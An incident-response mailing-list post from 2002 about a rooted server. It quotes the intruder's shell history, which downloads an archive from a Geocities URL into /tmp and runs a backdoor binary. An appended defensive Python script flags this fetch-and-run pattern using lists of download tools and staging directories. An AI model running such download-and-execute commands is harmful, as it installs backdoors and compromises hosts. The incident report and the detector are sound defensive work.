Re: Rooted, .haos on system
From: Damian Gerow (damian@sentex.net)
Date: 12/16/02
From: Damian Gerow <damian@sentex.net>
To: incidents@securityfocus.com
Date: 16 Dec 2002 13:47:28 -0500
On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it?
>
> Just a quick update to this...
And one last tidbit...
Left in the .bash_history was this:
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.
I've already notified Geocities abuse, and haven't heard back from them
yet.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
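
For responders triaging a similar host, the sequence in the quoted .bash_history (change into /tmp, download an archive, unpack it, run a binary from the same directory) can be flagged mechanically. The following is an added example, not part of the original message; the function name triage_history and the directory and tool lists are assumptions, and the sample input is the four history lines quoted above.

```python
import re
import shlex

# Constructed sample: the four history lines quoted in the message above.
SAMPLE_HISTORY = """w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
"""

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")   # assumption: dirs treated as staging areas
FETCHERS = {"wget", "curl", "fetch", "ftp", "lynx"}  # assumption: download tools to watch for


def triage_history(text):
    """Return (line_no, tag, command) findings for a fetch -> unpack -> run pattern."""
    cwd, fetched_in, findings = "~", None, []
    for line_no, line in enumerate(text.splitlines(), 1):
        # History lines may chain commands with ';', '&&' or '||'.
        for cmd in re.split(r";|&&|\|\|", line):
            try:
                argv = shlex.split(cmd)
            except ValueError:          # unbalanced quotes: fall back to whitespace split
                argv = cmd.split()
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            staging = cwd.startswith(WORLD_WRITABLE)
            if prog == "cd":
                target = argv[1] if len(argv) > 1 else "~"
                cwd = target if target.startswith(("/", "~")) else cwd.rstrip("/") + "/" + target
            elif prog in FETCHERS and staging:
                fetched_in = cwd
                findings.append((line_no, "download-to-staging", cmd.strip()))
            elif prog == "tar" and staging and fetched_in == cwd:
                findings.append((line_no, "unpack-after-download", cmd.strip()))
            elif argv[0].startswith("./") and fetched_in == cwd:
                findings.append((line_no, "exec-after-download", cmd.strip()))
    return findings


if __name__ == "__main__":
    for finding in triage_history(SAMPLE_HISTORY):
        print(finding)
```

Shell history is attacker-writable, so an empty result proves nothing; treat hits as leads to confirm against file timestamps and other logs.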